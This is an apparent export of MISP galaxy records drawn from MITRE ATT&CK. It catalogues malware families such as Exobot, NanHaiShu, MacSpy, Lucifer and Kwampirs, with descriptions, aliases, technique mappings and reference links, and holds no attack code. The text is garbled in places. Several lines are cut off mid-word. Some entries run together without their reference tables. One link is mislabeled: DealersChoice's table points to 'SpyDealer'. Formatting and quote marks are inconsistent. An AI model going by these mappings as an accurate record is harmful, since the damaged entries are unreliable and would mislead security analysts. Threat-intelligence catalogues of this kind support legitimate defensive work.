• uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Service - T1481" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/">https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/</a></td>
</tr>
</tbody>
</table>

**Exobot - S0522**

[Exobot](https://attack.mitre.org/software/S0522) is Android banking malware, primarily targeting financial institutions in Germany, Austria, and France.(Citation: Threat Fabric Exobot)

The tag is: misp-galaxy:mitre-malware="Exobot - S0522"

Exobot - S0522 is also known as:

• Exobot
• Marcher

Exobot - S0522 has relationships with:
- uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"

Table 4708. Table References

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<thead>
<tr>
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<tr>
<td><a href="https://attack.mitre.org/software/S0522">https://attack.mitre.org/software/S0522</a></td>
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<tr>
<td><a href="https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html">https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html</a></td>
</tr>
</tbody>
</table>

**NDiskMonitor - S0272**

[NDiskMonitor](https://attack.mitre.org/software/S0272) is a custom backdoor written in .NET that appears to be unique to [Patchwork](https://attack.mitre.org/groups/G0040). (Citation: TrendMicro Patchwork Dec 2017)
The tag is: `misp-galaxy:mitre-malware="NDiskMonitor - S0272"`

**NDiskMonitor - S0272** is also known as:

- **NDiskMonitor**

**NDiskMonitor - S0272** has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"

*Table 4709. Table References*

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<tr>
<td><a href="https://attack.mitre.org/software/S0272">https://attack.mitre.org/software/S0272</a></td>
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</tbody>
</table>

**NanHaiShu - S0228**

[NanHaiShu](https://attack.mitre.org/software/S0228) is a remote access tool and JScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). [NanHaiShu](https://attack.mitre.org/software/S0228) has been used to target government and private-sector organizations that have relations to the South China Sea dispute. (Citation: Proofpoint Leviathan Oct 2017) (Citation: fsecure NanHaiShu July 2016)

The tag is: `misp-galaxy:mitre-malware="NanHaiShu - S0228"`

**NanHaiShu - S0228** is also known as:

- **NanHaiShu**

**NanHaiShu - S0228** has relationships with:

- similar: `misp-galaxy:tool="NanHaiShu"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Mshta - T1218.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
Table 4710. Table References

<table>
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<tr>
<td><a href="https://attack.mitre.org/software/S0228">https://attack.mitre.org/software/S0228</a></td>
</tr>
</tbody>
</table>

**MacSpy - S0282**

[MacSpy](https://attack.mitre.org/software/S0282) is a malware-as-a-service offered on the darkweb (Citation: objsee mac malware 2017).

The tag is: **misp-galaxy:mitre-malware="MacSpy - S0282"**

MacSpy - S0282 is also known as:

- MacSpy

MacSpy - S0282 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"

Table 4711. Table References

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<th>Links</th>
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<tr>
<td><a href="https://attack.mitre.org/software/S0282">https://attack.mitre.org/software/S0282</a></td>
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<tr>
<td><a href="https://objective-see.com/blog/blog_0x25.html">https://objective-see.com/blog/blog_0x25.html</a></td>
</tr>
</tbody>
</table>

**AndroRAT - S0292**

[AndroRAT](https://attack.mitre.org/software/S0292) is malware that allows a third party to control the device and collect information. (Citation: Lookout-EnterpriseApps)

The tag is: *misp-galaxy:mitre-malware="AndroRAT - S0292"*

AndroRAT - S0292 is also known as:

- AndroRAT

AndroRAT - S0292 has relationships with:

- similar: misp-galaxy:malpedia="AndroRAT" with estimative-language:likelihood-probability="likely"


• uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

Table 4712. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0292">https://attack.mitre.org/software/S0292</a></td>
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<tr>
<td><a href="https://blog.lookout.com/blog/2016/05/25/spoofed-apps/">https://blog.lookout.com/blog/2016/05/25/spoofed-apps/</a></td>
</tr>
</tbody>
</table>

**Orz - S0229**

[Orz](https://attack.mitre.org/software/S0229) is a custom JavaScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. (Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018)

The tag is: *misp-galaxy:mitre-malware="Orz - S0229"*

**Orz - S0229 is also known as:**

- Orz
- AIRBREAK

**Orz - S0229 has relationships with:**

- similar: misp-galaxy:malpedia="AIRBREAK" with estimative-language:likelihood-probability="likely"

- uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Charger - S0323

[Charger](https://attack.mitre.org/software/S0323) is Android malware that steals contacts and SMS messages from the user's device. It can also lock the device and demand ransom payment if it receives admin permissions. (Citation: CheckPoint-Charger)

The tag is: `misp-galaxy:mitre-malware="Charger - S0323"`

Charger - S0323 is also known as:

- Charger

Charger - S0323 has relationships with:

- similar: `misp-galaxy:malpedia="Charger"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Device Lockout - T1446"` with estimative-language:likelihood-probability="almost-certain"
MURKYTOP - S0233

[MURKYTOP](https://attack.mitre.org/software/S0233) is a reconnaissance tool used by [Leviathan](https://attack.mitre.org/groups/G0065). (Citation: FireEye Periscope March 2018)

The tag is: `misp-galaxy:mitre-malware="MURKYTOP - S0233"

MURKYTOP - S0233 is also known as:

- MURKYTOP

MURKYTOP - S0233 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Local Account - T1087.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069"` with estimative-language:likelihood-probability="almost-certain"

Table 4715. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0233">https://attack.mitre.org/software/S0233</a></td>
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</table>
Bread - S0432

[Bread](https://attack.mitre.org/software/S0432) was a large-scale billing fraud malware family known for employing many different cloaking and obfuscation techniques in an attempt to continuously evade Google Play Store’s malware detection. 1,700 unique Bread apps were detected and removed from the Google Play Store before being downloaded by users.(Citation: Google Bread)

The tag is: `misp-galaxy:mitre-malware="Bread - S0432"`

Bread - S0432 is also known as:

- Bread
- Joker

Bread - S0432 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"` with estimative-language:likelihood-probability="almost-certain"

*Table 4716. Table References*

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<td><a href="https://attack.mitre.org/software/S0432">https://attack.mitre.org/software/S0432</a></td>
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**Bandook - S0234**

[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi, which has been available since roughly 2007 (Citation: EFF Manul Aug 2016) (Citation: Lookout Dark Caracal Jan 2018).

The tag is: `misp-galaxy:mitre-malware="Bandook - S0234"`

Bandook - S0234 is also known as:

- Bandook

Bandook - S0234 has relationships with:

- **uses**: `misp-galaxy:mitre-attack-pattern="Screen Capture - T1113"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Video Capture - T1125"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Audio Capture - T1123"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"` with estimative-language:likelihood-probability="almost-certain"
- **uses**: `misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012"` with estimative-language:likelihood-probability="almost-certain"

*Table 4717. Table References*

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<tr>
<td><a href="https://attack.mitre.org/software/S0234">https://attack.mitre.org/software/S0234</a></td>
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<tr>
<td><a href="https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf">https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf</a></td>
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</table>

**DealersChoice - S0243**

[DealersChoice](https://attack.mitre.org/software/S0243) is a Flash exploitation framework used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: Sofacy DealersChoice)

The tag is: `misp-galaxy:mitre-malware="DealersChoice - S0243"`

DealersChoice - S0243 is also known as:

- DealersChoice

DealersChoice - S0243 has relationships with:
• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 4718. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0243">SpyDealer</a></td>
</tr>
</tbody>
</table>

SpyDealer - S0324

[SpyDealer](https://attack.mitre.org/software/S0324) is Android malware that exfiltrates sensitive data from Android devices. (Citation: PaloAlto-SpyDealer)

The tag is: misp-galaxy:mitre-malware="SpyDealer - S0324"

SpyDealer - S0324 is also known as:

• SpyDealer

SpyDealer - S0324 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
GreyEnergy - S0342

[GreyEnergy](https://attack.mitre.org/software/S0342) is a backdoor written in C and compiled in Visual Studio. [GreyEnergy](https://attack.mitre.org/software/S0342) shares similarities with the [BlackEnergy](https://attack.mitre.org/software/S0089) malware and is thought to be the successor of it. (Citation: ESET GreyEnergy Oct 2018)

The tag is: `misp-galaxy:mitre-malware="GreyEnergy - S0342"`

GreyEnergy - S0342 is also known as:

- GreyEnergy

GreyEnergy - S0342 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001“ with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001“ with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004“ with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001“ with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003“ with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011“ with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112“ with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027“ with estimative-language:likelihood-probability="almost-certain"


Table 4720. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0342">https://attack.mitre.org/software/S0342</a></td>
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</table>

**Ginp - S0423**

[Ginp](https://attack.mitre.org/software/S0423) is an Android banking trojan that has been used to target Spanish banks. Some of the code was taken directly from [Anubis](https://attack.mitre.org/software/S0422). (Citation: ThreatFabric Ginp)

The tag is: *misp-galaxy:mitre-malware="Ginp - S0423"*

Ginp - S0423 is also known as:

- Ginp

Ginp - S0423 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411“ with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Sensitive Data in Device Logs - T1413" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

Table 4721. Table References

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<td><a href="https://attack.mitre.org/software/S0423">https://attack.mitre.org/software/S0423</a></td>
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<td><a href="https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html">https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html</a></td>
</tr>
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</table>

**CrossRAT - S0235**

[CrossRAT](https://attack.mitre.org/software/S0235) is a cross platform RAT.

The tag is: *misp-galaxy:mitre-malware="CrossRAT - S0235"*

CrossRAT - S0235 is also known as:

• CrossRAT

CrossRAT - S0235 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-


Table 4722. Table References

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<td><a href="https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf">https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf</a></td>
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**RunningRAT - S0253**

[RunningRAT](https://attack.mitre.org/software/S0253) is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [Brave Prince](https://attack.mitre.org/software/S0252). (Citation: McAfee Gold Dragon)

The tag is: misp-galaxy:mitre-malware="RunningRAT - S0253"

RunningRAT - S0253 is also known as:

- RunningRAT

RunningRAT - S0253 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
Table 4723. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0253">S0253</a></td>
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</table>

Judy - S0325

[Judy](https://attack.mitre.org/software/S0325) is auto-clicking adware that was distributed through multiple apps in the Google Play Store. (Citation: CheckPoint-Judy)

The tag is: `misp-galaxy:mitre-malware="Judy - S0325"`

Judy - S0325 is also known as:

- Judy

Judy - S0325 has relationships with:


Table 4724. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://attack.mitre.org/software/S0325">S0325</a></td>
</tr>
<tr>
<td><a href="https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/">Judy-Malware- Possibly-Largest-Malware-Campaign-Found-Google-Play</a></td>
</tr>
</tbody>
</table>

Lucifer - S0532

[Lucifer](https://attack.mitre.org/software/S0532) is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.(Citation: Unit 42 Lucifer June 2020)

The tag is: `misp-galaxy:mitre-malware="Lucifer - S0532"`

Lucifer - S0532 is also known as:

- Lucifer

Lucifer - S0532 has relationships with:
• uses: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

Table 4725. Table References

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<tbody>
<tr>
<td><a href="https://attack.mitre.org/software/S0532">https://attack.mitre.org/software/S0532</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/">https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/</a></td>
</tr>
</tbody>
</table>

**TYPEFRAME - S0263**

[TYPEFRAME](https://attack.mitre.org/software/S0263) is a remote access tool that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT TYPEFRAME June 2018)

The tag is: *misp-galaxy:mitre-malware="TYPEFRAME - S0263"*

**TYPEFRAME - S0263** is also known as:

- TYPEFRAME

**TYPEFRAME - S0263** has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 4726. Table References

<table>
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<tr>
<td><a href="https://attack.mitre.org/software/S0263">https://attack.mitre.org/software/S0263</a></td>
</tr>
<tr>
<td><a href="https://www.us-cert.gov/ncas/analysis-reports/AR18-165A">https://www.us-cert.gov/ncas/analysis-reports/AR18-165A</a></td>
</tr>
</tbody>
</table>

RedDrop - S0326

[RedDrop](https://attack.mitre.org/software/S0326) is an Android malware family that exfiltrates sensitive data from devices. (Citation: Wandera-RedDrop)

The tag is: misp-galaxy:mitre-malware="RedDrop - S0326"

RedDrop - S0326 is also known as:

- RedDrop

RedDrop - S0326 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448" with estimative-language:likelihood-probability="almost-certain"

Kwampirs - S0236

[Kwampirs](https://attack.mitre.org/software/S0236) is a backdoor Trojan used by [Orangeworm](https://attack.mitre.org/groups/G0071). It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. (Citation: Symantec Orangeworm April 2018)

The tag is: `misp-galaxy:mitre-malware="Kwampirs - S0236"`

Kwampirs - S0236 is also known as:

- Kwampirs

Kwampirs - S0236 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082"` with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

